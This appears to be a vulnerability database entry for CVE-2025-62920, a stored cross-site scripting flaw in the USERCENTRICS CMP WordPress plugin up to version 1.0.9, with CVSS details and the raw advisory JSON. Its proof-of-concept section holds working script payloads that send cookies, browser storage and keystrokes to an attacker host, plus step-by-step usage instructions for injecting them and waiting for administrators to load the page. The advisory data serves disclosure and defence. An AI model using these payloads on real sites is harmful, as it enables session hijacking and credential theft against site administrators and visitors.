Security Vulnerability Report
CVE-2025-62920 CVSS 5.9 MEDIUM

CVE-2025-62920

Published: 2025-10-27 02:15:52
Last Modified: 2026-04-27 18:16:31

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in webnique USERCENTRICS CMP usercentrics-consent-management-platform allows Stored XSS. This issue affects USERCENTRICS CMP: from n/a through <= 1.0.9.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

USERCENTRICS CMP WordPress plugin <= 1.0.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-62920 Stored XSS PoC for USERCENTRICS CMP WordPress Plugin -->
<!-- Payload: Inject malicious JavaScript via plugin's consent management feature -->

<!-- Method 1: Direct injection via plugin settings -->
<script>alert(document.cookie)</script>

<!-- Method 2: More sophisticated payload for cookie stealing -->
<script>
var img = document.createElement('img');
img.src = 'https://attacker.com/log?cookie=' + encodeURIComponent(document.cookie);
document.body.appendChild(img);
</script>

<!-- Method 3: Session hijacking payload -->
<script>
fetch('https://attacker.com/steal', {
  method: 'POST',
  mode: 'no-cors',
  body: JSON.stringify({
    cookies: document.cookie,
    localStorage: localStorage,
    sessionStorage: sessionStorage
  })
});
</script>

<!-- Method 4: Keylogger payload -->
<script>
document.addEventListener('keypress', function(e) {
  new Image().src = 'https://attacker.com/log?key=' + e.key;
});
</script>

<!-- Usage Instructions:
1. Identify the input field in USERCENTRICS CMP plugin (<= 1.0.9)
2. Inject one of the above payloads into the consent management settings
3. Wait for admin or other users to visit the affected page
4. Payload will execute in their browser context
5. Attacker receives stolen credentials/session data -->

References

https://patchstack.com/database/Wordpress/Plugin/usercentrics-consent-management-platform/vulnerability/wordpress-usercentrics-cmp-plugin-1-0-9-cross-site-scripting-xss-vulnerability?_s_id=cve
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-62920",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-27T02:15:51.580",
    "lastModified": "2026-04-27T18:16:31.007",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in webnique USERCENTRICS CMP usercentrics-consent-management-platform allows Stored XSS.This issue affects USERCENTRICS CMP: from n/a through <= 1.0.9."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 1.7,
          "impactScore": 3.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://patchstack.com/database/Wordpress/Plugin/usercentrics-consent-management-platform/vulnerability/wordpress-usercentrics-cmp-plugin-1-0-9-cross-site-scripting-xss-vulnerability?_s_id=cve",
        "source": "[email protected]"
      }
    ]
  }
}